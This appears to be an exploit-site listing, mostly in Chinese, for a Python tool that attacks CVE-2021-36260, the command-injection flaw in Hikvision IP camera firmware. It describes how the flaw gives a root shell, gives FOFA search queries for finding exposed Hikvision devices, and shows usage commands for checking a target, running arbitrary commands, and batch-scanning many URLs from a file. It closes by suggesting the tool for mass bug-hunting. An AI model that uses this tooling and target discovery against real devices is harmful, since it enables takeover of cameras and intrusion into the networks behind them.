Exploit for OS Command Injection in Hikvision Ds-2Cd2026G2-Iu\/Sl Firmware CVE-2021-36260

## https://sploitus.com/exploit?id=418BE453-0A45-5824-8B13-1994DF7349FF
# 海康威视 CVE-2021-36260 RCE 漏洞

## 漏洞描述

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备，即使设备的所有者受限于有限的受保护 shell（psh）。除了入侵 IP 摄像头外，还可以访问和攻击内部网络。

## FOFA

```
header="Hikvision"			 
app="HIKVISION-视频监控"
```

## 使用方法

```
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Start scanning url
  -f FILE, --file FILE  read the url from the file
  --check               Check if vulnerable
  --cmd CMD             execute cmd (i.e: "ls -l")
```

可批量挖掘src